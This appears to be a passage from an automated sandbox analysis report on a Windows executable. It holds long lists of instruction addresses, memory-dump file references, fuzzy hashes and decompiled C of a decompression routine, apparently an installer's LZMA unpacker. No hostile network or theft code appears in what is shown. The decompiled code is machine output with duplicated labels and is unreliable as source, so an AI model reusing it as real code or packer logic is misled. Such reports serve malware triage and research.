                                                                                                            0x00406194
                                                                                                            0x00406196
                                                                                                            0x00406197
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040643a
                                                                                                            0x0040643e
                                                                                                            0x00406461
                                                                                                            0x00406464
                                                                                                            0x00406467
                                                                                                            0x00406471
                                                                                                            0x00406440
                                                                                                            0x00406440
                                                                                                            0x00406443
                                                                                                            0x00406446
                                                                                                            0x00406449
                                                                                                            0x00406456
                                                                                                            0x00406459
                                                                                                            0x00406459
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040647d
                                                                                                            0x00406481
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406487
                                                                                                            0x0040648b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406491
                                                                                                            0x00406493
                                                                                                            0x00406497
                                                                                                            0x00406497
                                                                                                            0x0040649a
                                                                                                            0x0040649e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064ee
                                                                                                            0x004064f2
                                                                                                            0x004064f9
                                                                                                            0x004064fc
                                                                                                            0x004064ff
                                                                                                            0x00406509
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x004064f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406515
                                                                                                            0x00406519
                                                                                                            0x00406520
                                                                                                            0x00406523
                                                                                                            0x00406526
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x00406529
                                                                                                            0x0040652c
                                                                                                            0x0040652f
                                                                                                            0x0040652f
                                                                                                            0x00406532
                                                                                                            0x00406535
                                                                                                            0x00406538
                                                                                                            0x00406538
                                                                                                            0x0040653b
                                                                                                            0x00406542
                                                                                                            0x00406547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004065d5
                                                                                                            0x004065d5
                                                                                                            0x004065d9
                                                                                                            0x00406977
                                                                                                            0x00000000
                                                                                                            0x00406977
                                                                                                            0x004065df
                                                                                                            0x004065e2
                                                                                                            0x004065e5
                                                                                                            0x004065e9
                                                                                                            0x004065ec
                                                                                                            0x004065f2
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f7
                                                                                                            0x004065fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061ca
                                                                                                            0x004061ca
                                                                                                            0x004061ce
                                                                                                            0x0040693b
                                                                                                            0x00000000
                                                                                                            0x0040693b
                                                                                                            0x004061d4
                                                                                                            0x004061d7
                                                                                                            0x004061da
                                                                                                            0x004061de
                                                                                                            0x004061e1
                                                                                                            0x004061e7
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061ec
                                                                                                            0x004061ef
                                                                                                            0x004061ef
                                                                                                            0x004061f2
                                                                                                            0x004061f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061fb
                                                                                                            0x00406201
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406207
                                                                                                            0x00406207
                                                                                                            0x0040620b
                                                                                                            0x0040620e
                                                                                                            0x00406211
                                                                                                            0x00406214
                                                                                                            0x00406217
                                                                                                            0x00406218
                                                                                                            0x0040621b
                                                                                                            0x0040621d
                                                                                                            0x00406223
                                                                                                            0x00406226
                                                                                                            0x00406229
                                                                                                            0x0040622c
                                                                                                            0x0040622f
                                                                                                            0x00406232
                                                                                                            0x00406235
                                                                                                            0x00406251
                                                                                                            0x00406254
                                                                                                            0x00406257
                                                                                                            0x0040625a
                                                                                                            0x00406261
                                                                                                            0x00406265
                                                                                                            0x00406267
                                                                                                            0x0040626b
                                                                                                            0x00406237
                                                                                                            0x00406237
                                                                                                            0x0040623b
                                                                                                            0x00406243
                                                                                                            0x00406248
                                                                                                            0x0040624a
                                                                                                            0x0040624c
                                                                                                            0x0040624c
                                                                                                            0x0040626e
                                                                                                            0x00406275
                                                                                                            0x00406278
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x00406283
                                                                                                            0x00406283
                                                                                                            0x00406287
                                                                                                            0x00406947
                                                                                                            0x00000000
                                                                                                            0x00406947
                                                                                                            0x0040628d
                                                                                                            0x00406290
                                                                                                            0x00406293
                                                                                                            0x00406297
                                                                                                            0x0040629a
                                                                                                            0x004062a0
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a5
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004062b0
                                                                                                            0x004062b3
                                                                                                            0x004062b6
                                                                                                            0x004062b9
                                                                                                            0x004062bc
                                                                                                            0x004062bf
                                                                                                            0x004062c2
                                                                                                            0x004062c5
                                                                                                            0x004062c8
                                                                                                            0x004062cb
                                                                                                            0x004062ce
                                                                                                            0x004062e6
                                                                                                            0x004062e9
                                                                                                            0x004062ec
                                                                                                            0x004062ef
                                                                                                            0x004062ef
                                                                                                            0x004062f2
                                                                                                            0x004062f6
                                                                                                            0x004062f8
                                                                                                            0x004062d0
                                                                                                            0x004062d0
                                                                                                            0x004062d8
                                                                                                            0x004062dd
                                                                                                            0x004062df
                                                                                                            0x004062e1
                                                                                                            0x004062e1
                                                                                                            0x004062fb
                                                                                                            0x00406302
                                                                                                            0x00406305
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00406305
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406347
                                                                                                            0x00406347
                                                                                                            0x0040634b
                                                                                                            0x00406953
                                                                                                            0x00000000
                                                                                                            0x00406953
                                                                                                            0x00406351
                                                                                                            0x00406354
                                                                                                            0x00406357
                                                                                                            0x0040635b
                                                                                                            0x0040635e
                                                                                                            0x00406364
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406369
                                                                                                            0x0040636c
                                                                                                            0x0040636c
                                                                                                            0x00406372
                                                                                                            0x00406310
                                                                                                            0x00406310
                                                                                                            0x00406313
                                                                                                            0x00000000
                                                                                                            0x00406313
                                                                                                            0x00406374
                                                                                                            0x00406374
                                                                                                            0x00406377
                                                                                                            0x0040637a
                                                                                                            0x0040637d
                                                                                                            0x00406380
                                                                                                            0x00406383
                                                                                                            0x00406386
                                                                                                            0x00406389
                                                                                                            0x0040638c
                                                                                                            0x0040638f
                                                                                                            0x00406392
                                                                                                            0x004063aa
                                                                                                            0x004063ad
                                                                                                            0x004063b0
                                                                                                            0x004063b3
                                                                                                            0x004063b3
                                                                                                            0x004063b6
                                                                                                            0x004063ba
                                                                                                            0x004063bc
                                                                                                            0x00406394
                                                                                                            0x00406394
                                                                                                            0x0040639c
                                                                                                            0x004063a1
                                                                                                            0x004063a3
                                                                                                            0x004063a5
                                                                                                            0x004063a5
                                                                                                            0x004063bf
                                                                                                            0x004063c6
                                                                                                            0x004063c9
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x00406658
                                                                                                            0x00406658
                                                                                                            0x0040665c
                                                                                                            0x00406983
                                                                                                            0x00000000
                                                                                                            0x00406983
                                                                                                            0x00406662
                                                                                                            0x00406665
                                                                                                            0x00406668
                                                                                                            0x0040666c
                                                                                                            0x0040666f
                                                                                                            0x00406675
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x0040667a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406428
                                                                                                            0x00406428
                                                                                                            0x0040642b
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x00406767
                                                                                                            0x0040676b
                                                                                                            0x0040678d
                                                                                                            0x00406790
                                                                                                            0x0040679a
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040676d
                                                                                                            0x00406770
                                                                                                            0x00406774
                                                                                                            0x00406777
                                                                                                            0x00406777
                                                                                                            0x0040677a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406824
                                                                                                            0x00406828
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x0040684d
                                                                                                            0x00406854
                                                                                                            0x0040685b
                                                                                                            0x0040685b
                                                                                                            0x00000000
                                                                                                            0x0040685b
                                                                                                            0x0040682a
                                                                                                            0x0040682d
                                                                                                            0x00406830
                                                                                                            0x00406833
                                                                                                            0x0040683a
                                                                                                            0x0040677e
                                                                                                            0x0040677e
                                                                                                            0x00406781
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406915
                                                                                                            0x00406918
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040654f
                                                                                                            0x00406551
                                                                                                            0x00406558
                                                                                                            0x00406559
                                                                                                            0x0040655b
                                                                                                            0x0040655e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406566
                                                                                                            0x00406569
                                                                                                            0x0040656c
                                                                                                            0x0040656e
                                                                                                            0x00406570
                                                                                                            0x00406570
                                                                                                            0x00406571
                                                                                                            0x00406574
                                                                                                            0x0040657b
                                                                                                            0x0040657e
                                                                                                            0x0040658c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406862
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406871
                                                                                                            0x00406871
                                                                                                            0x00406875
                                                                                                            0x004069ad
                                                                                                            0x00000000
                                                                                                            0x004069ad
                                                                                                            0x0040687b
                                                                                                            0x0040687e
                                                                                                            0x00406881
                                                                                                            0x00406885
                                                                                                            0x00406888
                                                                                                            0x0040688e
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406893
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406899
                                                                                                            0x00406899
                                                                                                            0x0040689d
                                                                                                            0x004068fd
                                                                                                            0x00406900
                                                                                                            0x00406905
                                                                                                            0x00406906
                                                                                                            0x00406908
                                                                                                            0x0040690a
                                                                                                            0x0040690d
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x0040681f
                                                                                                            0x00406819
                                                                                                            0x0040689f
                                                                                                            0x004068a5
                                                                                                            0x004068a8
                                                                                                            0x004068ab
                                                                                                            0x004068ae
                                                                                                            0x004068b1
                                                                                                            0x004068b4
                                                                                                            0x004068b7
                                                                                                            0x004068ba
                                                                                                            0x004068bd
                                                                                                            0x004068c0
                                                                                                            0x004068d9
                                                                                                            0x004068dc
                                                                                                            0x004068df
                                                                                                            0x004068e2
                                                                                                            0x004068e6
                                                                                                            0x004068e8
                                                                                                            0x004068e8
                                                                                                            0x004068e9
                                                                                                            0x004068ec
                                                                                                            0x004068c2
                                                                                                            0x004068c2
                                                                                                            0x004068ca
                                                                                                            0x004068cf
                                                                                                            0x004068d1
                                                                                                            0x004068d4
                                                                                                            0x004068d4
                                                                                                            0x004068ef
                                                                                                            0x004068f6
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x00406594
                                                                                                            0x00406597
                                                                                                            0x004065cd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x00406700
                                                                                                            0x00406700
                                                                                                            0x00406703
                                                                                                            0x00406705
                                                                                                            0x0040698f
                                                                                                            0x00000000
                                                                                                            0x0040698f
                                                                                                            0x0040670b
                                                                                                            0x0040670e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406714
                                                                                                            0x00406718
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x00000000
                                                                                                            0x0040671b
                                                                                                            0x00406599
                                                                                                            0x0040659b
                                                                                                            0x0040659d
                                                                                                            0x0040659f
                                                                                                            0x004065a2
                                                                                                            0x004065a3
                                                                                                            0x004065a5
                                                                                                            0x004065a7
                                                                                                            0x004065aa
                                                                                                            0x004065ad
                                                                                                            0x004065c3
                                                                                                            0x004065c8
                                                                                                            0x00406600
                                                                                                            0x00406600
                                                                                                            0x00406604
                                                                                                            0x00406630
                                                                                                            0x00406632
                                                                                                            0x00406639
                                                                                                            0x0040663c
                                                                                                            0x0040663f
                                                                                                            0x0040663f
                                                                                                            0x00406644
                                                                                                            0x00406644
                                                                                                            0x00406646
                                                                                                            0x00406649
                                                                                                            0x00406650
                                                                                                            0x00406653
                                                                                                            0x00406680
                                                                                                            0x00406680
                                                                                                            0x00406683
                                                                                                            0x00406686
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x00000000
                                                                                                            0x004066fa
                                                                                                            0x00406688
                                                                                                            0x0040668e
                                                                                                            0x00406691
                                                                                                            0x00406694
                                                                                                            0x00406697
                                                                                                            0x0040669a
                                                                                                            0x0040669d
                                                                                                            0x004066a0
                                                                                                            0x004066a3
                                                                                                            0x004066a6
                                                                                                            0x004066a9
                                                                                                            0x004066c2
                                                                                                            0x004066c4
                                                                                                            0x004066c7
                                                                                                            0x004066c8
                                                                                                            0x004066cb
                                                                                                            0x004066cd
                                                                                                            0x004066d0
                                                                                                            0x004066d2
                                                                                                            0x004066d4
                                                                                                            0x004066d7
                                                                                                            0x004066d9
                                                                                                            0x004066dc
                                                                                                            0x004066e0
                                                                                                            0x004066e2
                                                                                                            0x004066e2
                                                                                                            0x004066e3
                                                                                                            0x004066e6
                                                                                                            0x004066e9
                                                                                                            0x004066ab
                                                                                                            0x004066ab
                                                                                                            0x004066b3
                                                                                                            0x004066b8
                                                                                                            0x004066ba
                                                                                                            0x004066bd
                                                                                                            0x004066bd
                                                                                                            0x004066ec
                                                                                                            0x004066f3
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f3
                                                                                                            0x00406606
                                                                                                            0x00406609
                                                                                                            0x0040660b
                                                                                                            0x0040660e
                                                                                                            0x00406611
                                                                                                            0x00406614
                                                                                                            0x00406616
                                                                                                            0x00406619
                                                                                                            0x0040661c
                                                                                                            0x0040661c
                                                                                                            0x0040661f
                                                                                                            0x0040661f
                                                                                                            0x00406622
                                                                                                            0x00406629
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00406629
                                                                                                            0x004065af
                                                                                                            0x004065b2
                                                                                                            0x004065b4
                                                                                                            0x004065b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406316
                                                                                                            0x00406316
                                                                                                            0x0040631a
                                                                                                            0x0040695f
                                                                                                            0x00000000
                                                                                                            0x0040695f
                                                                                                            0x00406320
                                                                                                            0x00406323
                                                                                                            0x00406326
                                                                                                            0x00406329
                                                                                                            0x0040632c
                                                                                                            0x0040632f
                                                                                                            0x00406332
                                                                                                            0x00406334
                                                                                                            0x00406337
                                                                                                            0x0040633a
                                                                                                            0x0040633d
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064a1
                                                                                                            0x004064a1
                                                                                                            0x004064a5
                                                                                                            0x0040696b
                                                                                                            0x00000000
                                                                                                            0x0040696b
                                                                                                            0x004064ab
                                                                                                            0x004064ae
                                                                                                            0x004064b1
                                                                                                            0x004064b4
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b9
                                                                                                            0x004064bc
                                                                                                            0x004064bf
                                                                                                            0x004064c2
                                                                                                            0x004064c5
                                                                                                            0x004064c8
                                                                                                            0x004064c9
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064ce
                                                                                                            0x004064d1
                                                                                                            0x004064d4
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064da
                                                                                                            0x004064dc
                                                                                                            0x004064dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x00406722
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406728
                                                                                                            0x0040672b
                                                                                                            0x0040672e
                                                                                                            0x00406731
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406736
                                                                                                            0x00406739
                                                                                                            0x0040673c
                                                                                                            0x0040673f
                                                                                                            0x00406742
                                                                                                            0x00406745
                                                                                                            0x00406746
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x0040674b
                                                                                                            0x0040674e
                                                                                                            0x00406751
                                                                                                            0x00406754
                                                                                                            0x00406757
                                                                                                            0x0040675b
                                                                                                            0x0040675d
                                                                                                            0x00406760
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x004064df
                                                                                                            0x004064df
                                                                                                            0x00000000
                                                                                                            0x004064df
                                                                                                            0x00406760
                                                                                                            0x00406995
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x004069cc
                                                                                                            0x004069cc
                                                                                                            0x00000000
                                                                                                            0x004069cc
                                                                                                            0x00406819
                                                                                                            0x004067a0
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x004063d4

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                            • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                                            • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                            • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
